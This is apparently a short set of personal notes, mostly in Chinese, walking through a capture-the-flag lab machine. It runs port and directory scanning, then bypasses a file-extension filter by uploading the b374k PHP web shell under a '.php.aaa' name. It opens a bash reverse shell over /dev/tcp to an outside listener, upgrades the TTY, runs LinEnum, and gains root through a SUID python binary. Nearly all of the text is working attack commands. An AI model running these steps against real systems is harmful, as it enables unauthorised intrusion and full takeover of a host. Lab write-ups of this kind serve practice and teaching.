nmap -A 10.10.233.205
python3 dirsearch.py -u http://10.10.233.205/ -e all
/panel/
/uploads/
/panel/
可以上傳檔案
b374k.php
PHP是不允許的!
(葡萄牙文)b374k.php.aaa
文件上傳成功!
Veja!
會跳轉到 http://10.10.233.205/uploads/b374k.php.aaa
b374k
就能進入 shellnc -vlk 7877
bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'
python -c 'import pty; pty.spawn("/bin/bash")'
LinEnum.sh
chmod +x LinEnum.sh
LinEnum
並順便輸出到檔案
./LinEnum.sh | tee meow.txt
/usr/bin/python
有 SUIDpython -c 'import os; os.execl("/bin/sh", "sh", "-p")'